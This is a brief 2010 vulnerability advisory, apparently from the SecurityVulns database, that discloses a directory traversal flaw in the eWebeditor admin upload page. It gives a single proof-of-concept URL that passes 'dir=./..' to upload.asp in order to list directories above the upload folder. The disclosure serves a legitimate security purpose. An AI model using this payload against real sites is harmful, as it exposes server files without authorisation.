eWebeditor Directory Traversal Vulnerability

2010-01-21T00:00:00
ID SECURITYVULNS:DOC:23088
Type securityvulns
Reporter Securityvulns
Modified 2010-01-21T00:00:00

Description

Securitylab.ir

Application Info:

Name: eWebeditor

Version: all version

Vulnerability Info:

Type: Directory Traversal

Risk: Medium

Vulnerability:

http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..

Discoverd By: Pouya Daneshmand

Website: http://securitylab.ir

Contacts: info[at]securitylab.ir & whh_iran@yahoo.com